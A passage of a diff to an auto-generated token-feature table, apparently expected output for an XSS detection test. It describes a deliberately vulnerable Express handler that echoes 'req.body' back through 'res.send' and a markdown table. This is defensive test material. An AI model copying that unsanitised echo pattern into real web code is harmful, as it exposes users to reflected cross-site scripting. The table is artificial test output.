contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | return of anonymous function | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:22:35:1 | return of anonymous function | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:31:28:33 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:28:36:28:38 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:5 | res | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:10 | res.send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:10 | res.send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:10 | res.send | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:10 | res.send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:10 | res.send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | exceptional return of res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | exceptional return of res.send(req.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | exceptional return of res.send(req.body) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | exceptional return of res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | exceptional return of res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | res.send(req.body) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | res.send(req.body) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | res.send(req.body) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | res.send(req.body) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:3:29:20 | res.send(req.body) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:7:29:10 | send | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:7:29:10 | send | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:7:29:10 | send | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:7:29:10 | send | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:7:29:10 | send | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:14 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:14 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:14 | req | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:14 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:14 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:19 | req.body | CalleeFlexibleAccessPath | res.send | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:19 | req.body | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:19 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | @@ -19652,6 +132494,41 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:19 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:19 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:12:29:19 | req.body | receiverName | res | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:16:29:19 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:16:29:19 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:16:29:19 | body | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:16:29:19 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:29:16:29:19 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:30:13 | mytable | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:30:13 | mytable | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:30:13 | mytable | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:30:13 | mytable | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:30:13 | mytable | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable ... y]\\n ]) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable ... y]\\n ]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable ... y]\\n ]) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable ... y]\\n ]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:7:33:4 | mytable ... y]\\n ]) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:30:21 | table | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:30:21 | table | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:30:21 | table | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:30:21 | table | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:30:21 | table | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | exceptional return of table([ ... y]\\n ]) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | exceptional return of table([ ... y]\\n ]) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | exceptional return of table([ ... y]\\n ]) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | exceptional return of table([ ... y]\\n ]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | exceptional return of table([ ... y]\\n ]) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:17:33:4 | table([ ... y]\\n ]) | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:23:33:3 | [\\n [ ... dy]\\n ] | CalleeFlexibleAccessPath | table | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:23:33:3 | [\\n [ ... dy]\\n ] | InputArgumentIndex | 0 | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:23:33:3 | [\\n [ ... dy]\\n ] | calleeImports | markdown-table | @@ -19661,35 +132538,100 @@ tokenFeatures | autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:23:33:3 | [\\n [ ... dy]\\n ] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:30:23:33:3 | [\\n [ ... dy]\\n ] | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:5:31:23 | ['Name', 'Content'] | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:6:31:11 | 'Name' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:31:14:31:22 | 'Content' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:5:32:22 | ['body', req.body] | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:6:32:11 | 'body' | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:16 | req | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:16 | req | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:16 | req | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | contextSurroundingFunctionParameters | | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | contextSurroundingFunctionParameters | (req, res) | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | enclosingFunctionName | app.get#functionalargument | | autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:14:32:21 | req.body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:18:32:21 | body | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:18:32:21 | body | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:18:32:21 | body | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:18:32:21 | body | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:32:18:32:21 | body | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table marked rehype-document rehype-format rehype-sanitize rehype-stringify remark remark-parse remark-rehype showdown snarkdown unified | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:5 | res | contextFunctionInterfaces | handler(request)\nmoreBadStuff(params, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:5 | res | enclosingFunctionBody | req res res send req body mytable table Name Content body req body res send mytable | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:5 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/Xss/ReflectedXss/ReflectedXss.js:34:3:34:5 | res | fileImports | express hapi markdown-it markdown-it-abbr markdown-it-highlightjs markdown-it-sanitizer markdown-table 